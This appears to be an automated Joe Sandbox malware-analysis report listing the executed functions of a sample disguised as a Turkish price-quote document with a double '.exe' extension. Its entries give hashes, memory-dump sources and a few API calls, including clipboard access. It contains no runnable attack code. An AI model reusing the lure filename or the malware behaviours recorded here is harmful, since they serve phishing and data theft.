
API ID:
String ID:
API String ID:
Opcode ID: b0524ab472d92e29e5abdcacb5df1662fc7c7ddfeec63fd7fc5a17b50454a625
Instruction ID: 0cf11f70c1e9a3eec66e7de737e00adccee884945c76f5dd8b420a0ef3fe0ff9
Opcode Fuzzy Hash: b0524ab472d92e29e5abdcacb5df1662fc7c7ddfeec63fd7fc5a17b50454a625
Instruction Fuzzy Hash: 72E1F774E002598FDB14EFA9C591AAEFBF2FF89305F248159D414AB355D730A942CFA0

Function 00C2E504 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1451269605.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f34b36a0ba0e579ec9a38a5846748a8084aa38343a5483fade52fe874934a26d
Instruction ID: efabbf48a1721409454519374f729ac42e5320ecc3f4222cf7f67c722db9cf8b
Opcode Fuzzy Hash: f34b36a0ba0e579ec9a38a5846748a8084aa38343a5483fade52fe874934a26d
Instruction Fuzzy Hash: 3FA17D32E102298FCF15DFB5D8405AEB7B2FF84304B15457AE805BB265EB71E956CB80

Function 06A9543F Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9da147c587801df6b12ff2db796d125e3506737b2fb29e45728e5420bf4a5151
Instruction ID: d5cf0aab66a066f8bee4711f97a44f344843e6d7a0e041f9eeab634452a83d3e
Opcode Fuzzy Hash: 9da147c587801df6b12ff2db796d125e3506737b2fb29e45728e5420bf4a5151
Instruction Fuzzy Hash: 7B510874E002198BDB14DFA9C9815AEFBF2FF89304F24C169D418AB356DB319942CF61

Function 06A95879 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1455250254.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a90000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 388f02ac2e1109d38fe923e6328c99f06a9721341d6981282d9fe9534516d161
Instruction ID: f200f4a2a09ea5a180a433ecbda743388940d4faa246e244f1c81a1bfd78acfe
Opcode Fuzzy Hash: 388f02ac2e1109d38fe923e6328c99f06a9721341d6981282d9fe9534516d161
Instruction Fuzzy Hash: 7F510974E102198BDB14DFA9C9816AEFBF2FF89304F24C169D418AB355D731A942CFA1

Analysis Process: #U0130LC#U0130 HOLD#U0130NG a.s fiyati_teklif 017867Sipari#U015fi jpeg doc .exePID: 8084, Parent PID: 7916COMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	78
Total number of Limit Nodes:	12

Executed Functions

Function 059B97B0 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3872999710.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_59b0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4a659596dcb0e87431c2101be5ff15f9df81699d5091ff45405c152521dc229
Instruction ID: def2a28c3e3b2f8cf62fa261111fa58faba2bf16e1d90775c114ad601d76f64d
Opcode Fuzzy Hash: f4a659596dcb0e87431c2101be5ff15f9df81699d5091ff45405c152521dc229
Instruction Fuzzy Hash: 2AF1E474E10218CFEB24DFA9C984B9DFBB2BF88304F1081A9E548AB355DB749985CF50

Function 02C2A088 Relevance: .9, Instructions: 890COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcabc7d0f36b62678210693a733968095968c4674af75131b0f88dc2b3394873
Instruction ID: 7c0ff1af9b42cf9000ec54fa9e6457506f0925a4f1a1c5954b277600ba247085
Opcode Fuzzy Hash: bcabc7d0f36b62678210693a733968095968c4674af75131b0f88dc2b3394873
Instruction Fuzzy Hash: A6826B31A00219DFCB15CFA9C984AAEBBF2FF88314F158559E8059B265DB31ED49CF90

Function 02C269A0 Relevance: .5, Instructions: 510
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c99dc952e2cda409a27044dd899a4516427b2edef10979d63b66421f16d3f14
Instruction ID: a159a9c6c09ef573d78c9a1d13898bc34e031a5a4e3560aa56c5ddc1e517d197
Opcode Fuzzy Hash: 1c99dc952e2cda409a27044dd899a4516427b2edef10979d63b66421f16d3f14
Instruction Fuzzy Hash: DD124B70A002199FDB14DF6AD854BAEBBB6FF88304F208569E505EB351DF349D45CBA0

Function 02C27118 Relevance: .3, Instructions: 339COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6326a3aabc5504ffa350df23f37f9ed99838788cdf362497e0976e1d3c045d3f
Instruction ID: a47f4f9f42cbc0ce034ad19ca5d6762451cb3b8c92c8e76e110d2311dfecd2e2
Opcode Fuzzy Hash: 6326a3aabc5504ffa350df23f37f9ed99838788cdf362497e0976e1d3c045d3f
Instruction Fuzzy Hash: 91E11E70E01125DFCB15CFA9C9C4AADFBB6BF88304F658465E805AB265DB30E949CF50

Function 02C26498 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdd0f7094502d6b6ad8717e0f07b4881d1eb57aef61c4ffe6e349ed5b31b3cf3
Instruction ID: 6c0c724ebb97601b226a3747152681bedf117a0df45684cd83e758e836831b37
Opcode Fuzzy Hash: fdd0f7094502d6b6ad8717e0f07b4881d1eb57aef61c4ffe6e349ed5b31b3cf3
Instruction Fuzzy Hash: 83818130A00625CFCB14CF69C888A69BBFAFF89608F248169D505E7365DF31E949CB70

Function 02C25362 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6d4a1cadcac34721b5299900fae27342bcb0e703a2cb5f6a94c0548517be892
Instruction ID: 672f7cc7ff40fde8bdb982a7941acbb2c6339615a8f63556eaea664032ec9399
Opcode Fuzzy Hash: d6d4a1cadcac34721b5299900fae27342bcb0e703a2cb5f6a94c0548517be892
Instruction Fuzzy Hash: 2491D774E00258CFDB18DFAAD984A9EBBF2BF89300F548069E409AB365DB359945CF50

Function 02C2CFF7 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: afef5af9d60b7c821d7954307d5f6b5bfa4cea4c53aafbc91345c22d48cf90cc
Instruction ID: 7893883cc45e0979c61b64597096f0bfdc383606531d4b8fde2380f64f0abea7
Opcode Fuzzy Hash: afef5af9d60b7c821d7954307d5f6b5bfa4cea4c53aafbc91345c22d48cf90cc
Instruction Fuzzy Hash: 0E81A774E00228CFEB14DFAAD984A9DBBF2BF98310F14C069E419AB365DB349945CF50

Function 02C2CD28 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4909e143117d8e0185d2f366021e392130cf8393ddf519e73cdd02c5db78e40e
Instruction ID: c414318888969b58c861a13bb6416e6087ffc9a7e2d650c97897fbb84fc52b00
Opcode Fuzzy Hash: 4909e143117d8e0185d2f366021e392130cf8393ddf519e73cdd02c5db78e40e
Instruction Fuzzy Hash: B181A574E00258CFDB14DFAAD884A9DBBF2BF88300F15C06AE419AB365DB359985CF50

Function 02C2C19A Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e40611e13f8e5e33953581a46cad6fd8ac691e8dc25c33b5e892f20469c9b18
Instruction ID: 1bc5efdd9020cf40c1aed95fcf901b59c81f84efc6c8ed2aa95084441445be31
Opcode Fuzzy Hash: 0e40611e13f8e5e33953581a46cad6fd8ac691e8dc25c33b5e892f20469c9b18
Instruction Fuzzy Hash: 1481B674E00218CFDB14DFAAD984A9DBBF2BF88304F15806AE409AB355DB345A45DF54

Function 02C2C468 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e93a42332c29ce53721cc46820a083e62b8f6260f659ccdc6b48a2bf339cbf4
Instruction ID: 4e8462936fe9ea805a09bc0822828a8307e875dd7b109aaf678235b4d819df99
Opcode Fuzzy Hash: 5e93a42332c29ce53721cc46820a083e62b8f6260f659ccdc6b48a2bf339cbf4
Instruction Fuzzy Hash: 5D81D674E00218CFDB14DFAAD884B9DBBF2BF88300F15916AE419AB355DB345985CF10

Function 02C2C738 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19e3424b96d3f1e4b6825ab556e3908a98d62926acea7d74952032197450c567
Instruction ID: b985c8eef0a6dad154fd61f46eee1de8cf552c5201381dd9ddfec9a506f86e1c
Opcode Fuzzy Hash: 19e3424b96d3f1e4b6825ab556e3908a98d62926acea7d74952032197450c567
Instruction Fuzzy Hash: 1B819174E00218CFEB14DFAAD984B9DBBB2BF88300F15806AE419AB365DB345985CF50

Function 02C2D599 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eac1ac0c1bc1bfd0bf6ae85415c97a9f4827ca9e9d6bf5962b6a029b1ef52aee
Instruction ID: 4d0c19e633815e65a9aa27402990b25c1b38fb5df11a3d02a5a209f2579df389
Opcode Fuzzy Hash: eac1ac0c1bc1bfd0bf6ae85415c97a9f4827ca9e9d6bf5962b6a029b1ef52aee
Instruction Fuzzy Hash: 7881A474E00218CFEB14DFAAD984A9DBBF2BF98300F14C069E409AB365DB349985CF50

Function 02C2D2CA Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f690edd0c58e1143a252bce27b389328699aeae9cb78958876051f08a3af7850
Instruction ID: 242cf565c4e1e37354a3477aacf0d23155ac4b89bfb257e2a7a344ab812030cd
Opcode Fuzzy Hash: f690edd0c58e1143a252bce27b389328699aeae9cb78958876051f08a3af7850
Instruction Fuzzy Hash: 5881B474E00218CFDB18DFAAD984A9DBBF2BF98304F14C069E409AB365DB349985DF10

Function 02C2EC18 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 166a9971dd5d2266a01facba4b27498be7b99116b8e5d0b870a60522782bf2e0
Instruction ID: 4b2f44fed7c41dc6cccec211712497a373df64e4d3d2b0990dd94753e958940d
Opcode Fuzzy Hash: 166a9971dd5d2266a01facba4b27498be7b99116b8e5d0b870a60522782bf2e0
Instruction Fuzzy Hash: C2518674E00218DFDB18DFAAD894A9DBBB2FF89300F249129E815BB364DB345945CF54

Function 02C2EC0A Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74dd47684c66e473f03515b28b88858f24eca235436335b684ca4237428e9ce8
Instruction ID: 3d357ba6f48f3a57a3a0602d49861e15285c8f29a4144c5f08052cf9c88c6fe4
Opcode Fuzzy Hash: 74dd47684c66e473f03515b28b88858f24eca235436335b684ca4237428e9ce8
Instruction Fuzzy Hash: CC519674E00218DFDB18DFAAD894A9DBBB2FF89300F249169E815BB365DB305945CF14

Function 02C2D869 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a0deae1bf8bce4c9ce41a6361d6d8545bb8ac2b118c0bc12070fb0c3d9d43a2
Instruction ID: af5ad533133ed2e5825501add95d6c996acb83979187fff7cceea651e2b5a87c
Opcode Fuzzy Hash: 3a0deae1bf8bce4c9ce41a6361d6d8545bb8ac2b118c0bc12070fb0c3d9d43a2
Instruction Fuzzy Hash: 5251A474E01218DFDB54DFAAD88499DBBF2FF89300F208169E509AB365DB30A901CF50

Function 0131B9F4 Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 0131CA80

Memory Dump Source

Source File: 00000004.00000002.3865767412.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1310000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 6c7ce46a38e111fc63949795fa97193952cc306990066718ff49801fe4b930de
Instruction ID: b9ffd2d75b54ce7448b301c72dedfa13113e3b73e4283caaceb5f75dacd5d709
Opcode Fuzzy Hash: 6c7ce46a38e111fc63949795fa97193952cc306990066718ff49801fe4b930de
Instruction Fuzzy Hash: 3A3122B094124DDFEB14CF99C884B9EBBF5AF48708F208019E004BB394DBB4A845CB95

Function 0131C9ED Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 0131CA80

Memory Dump Source

Source File: 00000004.00000002.3865767412.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1310000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: f79204f6e2e588b16d00906044dc5a46431439dff3658d68aa34bf8ab3a342bc
Instruction ID: adc989b67830fbbd2c17fb01d433fce8f41ed4b6124177f0de2fd04f2e2588e6
Opcode Fuzzy Hash: f79204f6e2e588b16d00906044dc5a46431439dff3658d68aa34bf8ab3a342bc
Instruction Fuzzy Hash: 233111B1D41349DFEB14DFA9C884BDDBBF1AF48708F24805AE004BB294DBB49945CB51

Function 059B9B94 Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 059B9CD6

Memory Dump Source

Source File: 00000004.00000002.3872999710.00000000059B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_59b0000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c990e9c84ae3961b1ae452f26bcfd1b3f332a2020551bb616c243a247e1687bc
Instruction ID: f1264d8afe8fee73260100d7717792e9162fe7fb4c3b1a2a49f847da93df88f2
Opcode Fuzzy Hash: c990e9c84ae3961b1ae452f26bcfd1b3f332a2020551bb616c243a247e1687bc
Instruction Fuzzy Hash: 31115974E142198FFB14DBA8D584AEDBBF5FB88304F148165E908E7342D771A941CB60

Function 01319BF0 Relevance: 1.5, APIs: 1, Instructions: 46
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 0131AAF5

Memory Dump Source

Source File: 00000004.00000002.3865767412.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1310000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 22e363199132d1299ef80e178e1acdf1f2fed6ae94c4adc6d5ae5f23da7fddfb
Instruction ID: 1088ba3946e80dc71853d3d6c08e522e1f629209ee88ca898cd4b1df5cf802c0
Opcode Fuzzy Hash: 22e363199132d1299ef80e178e1acdf1f2fed6ae94c4adc6d5ae5f23da7fddfb
Instruction Fuzzy Hash: 951145B59003898FDB20DF9AC484B9EFFF8EB48224F108419E519A3600C378A944CFA4

Function 01319C9C Relevance: 1.5, APIs: 1, Instructions: 46
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0131AFDF), ref: 0131BE6D

Memory Dump Source

Source File: 00000004.00000002.3865767412.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1310000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: be072af335ddb82b2515d366ef01cc6414479817e29173fe024016e3bc3276cc
Instruction ID: a782d47345276cd3e25d3c341cccd141c0ca86c43a4ccb67ebbc292a9ef85b22
Opcode Fuzzy Hash: be072af335ddb82b2515d366ef01cc6414479817e29173fe024016e3bc3276cc
Instruction Fuzzy Hash: FC11FEB5C046498FCB24DF9AE484B9EFBF4EB48324F10842AE519A3654D378A544CFA5

Function 0131BE08 Relevance: 1.5, APIs: 1, Instructions: 46
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,0131AFDF), ref: 0131BE6D

Memory Dump Source

Source File: 00000004.00000002.3865767412.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1310000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 7ac2dcbfa03843e3db7e81e7c234276e14cf4588403cb8fe4c8c18eace3631e0
Instruction ID: 57783b365999ff0ec543e5fe67e7d1812f1f6136b5d3c56f1025410dc44fb95c
Opcode Fuzzy Hash: 7ac2dcbfa03843e3db7e81e7c234276e14cf4588403cb8fe4c8c18eace3631e0
Instruction Fuzzy Hash: 391110B1C006498FCB24DFAAE444BDEFBF4AB48324F10851AD528A3290C378A544CFA1

Function 0131AA98 Relevance: 1.5, APIs: 1, Instructions: 45
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 0131AAF5

Memory Dump Source

Source File: 00000004.00000002.3865767412.0000000001310000.00000040.00000800.00020000.00000000.sdmp, Offset: 01310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1310000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 12277e23e5833c750539eb89d05cf1272b4d71539221409cc6843854e362673a
Instruction ID: bb38c48c1b8b80de8c3f0e7e7a9bfb9a8bb72fc69fc14fd0f922819c4c3945bf
Opcode Fuzzy Hash: 12277e23e5833c750539eb89d05cf1272b4d71539221409cc6843854e362673a
Instruction Fuzzy Hash: 5A1133B58003898FDB20DFAAC485BCEFFF4AB48224F10841AD518A3640C378A544CFA1

Function 02C2E2A8 Relevance: .6, Instructions: 647
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2b4195f1cccd29a0d8f4b10d4cf9f7113ed473564558ec4c94d3368fc8ad44
Instruction ID: 9ef24c6ef1a0898846c186243724b7fb7b06931b338fc3e27587d1a7050d38b8
Opcode Fuzzy Hash: ab2b4195f1cccd29a0d8f4b10d4cf9f7113ed473564558ec4c94d3368fc8ad44
Instruction Fuzzy Hash: FE12B9348A26578FE2403F30E9EC27ABA60FF4F723745AE09E10FC9841DB711065CA65

Function 02C20C8F Relevance: .5, Instructions: 545
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d459ebee55fb37b8833be934252a0eeabb0abe5d00bee6adeaf979de507853c9
Instruction ID: b9d3d654dd8f3e6fb5d3988b846b988d7132256b4e89724b3532dfb0903f8421
Opcode Fuzzy Hash: d459ebee55fb37b8833be934252a0eeabb0abe5d00bee6adeaf979de507853c9
Instruction Fuzzy Hash: 7852EC78900229CFCB54EF25E998B9DBBB2FF88705F1046A5D509A7368DB316D85CF80

Function 02C20CA0 Relevance: .5, Instructions: 539
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2595a894ce764ff6ddc0bd1fb106eea66d2911f810021c6cf0322015f2835e1e
Instruction ID: 6df6e594481cf5476d699b368c515f12604b3513a28fe2db24d5912f7da44722
Opcode Fuzzy Hash: 2595a894ce764ff6ddc0bd1fb106eea66d2911f810021c6cf0322015f2835e1e
Instruction Fuzzy Hash: 3A52EC7890022ACFCB54EF25E988B9DBBB2FF88705F1046A5D509A7358DB316D85DF80

Function 02C276F1 Relevance: .5, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8034fdc782b43016fb034e39ad34ca88ccd369c585d3684ddc0f5a3e032787b
Instruction ID: c3c0f2a7a5c624a21a0f3e55efc741b4614d56be70eee0ea1298bf4dde0e40a1
Opcode Fuzzy Hash: b8034fdc782b43016fb034e39ad34ca88ccd369c585d3684ddc0f5a3e032787b
Instruction Fuzzy Hash: 59124A30A00619CFDB14DF69D9C4AAEBBF2FF88714F148559E805AB261DB30ED49CB50

Function 02C25F38 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c49a041434a4bdbb70e392712291c171b69b9a8bcedff89889e3b96bc72bf29
Instruction ID: 69c9052883e38e59160416f822019c0d670a0ca6bf13e19146439e15930d8065
Opcode Fuzzy Hash: 6c49a041434a4bdbb70e392712291c171b69b9a8bcedff89889e3b96bc72bf29
Instruction Fuzzy Hash: 6591CD30B002218FDB159F29C858B6E7BB6AFC8304F258969E906CB391DF39DD05D7A1

Function 02C29A10 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f1f9c0ce13e9f2c706514bf954fc19d87d7a90e4ba52363b33f997dc7219e4
Instruction ID: 6fc45ab82b7050d7ae546b41b547f06fd4a0eac667109316170e0103448ccdf4
Opcode Fuzzy Hash: 03f1f9c0ce13e9f2c706514bf954fc19d87d7a90e4ba52363b33f997dc7219e4
Instruction Fuzzy Hash: E3810331901715DFC710CF28C880AAABBB6FF85324F25C66AD85897355DB31F91ACBA0

Function 02C229EC Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2c20000_#U0130LC#U0130 HOLD#U0130NG a.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25b2eb97a9f638704f078e43c4c1a8f4632857d8f94e7ad1688a60ad5b45d6c1
Instruction ID: 807694079c15b434b0357efa141709e3652489fc66d86908bf1c0c4b5c6810be
Opcode Fuzzy Hash: 25b2eb97a9f638704f078e43c4c1a8f4632857d8f94e7ad1688a60ad5b45d6c1
Instruction Fuzzy Hash: 4C71B331E043298BDF64DBB888547AEB7B6BFC8310F1445A6C816B7241DF748A49CB92

Function 02C280D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3865881634.0000000002C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C20000, based on PE: false

Joe Sandbox IDA Plugin

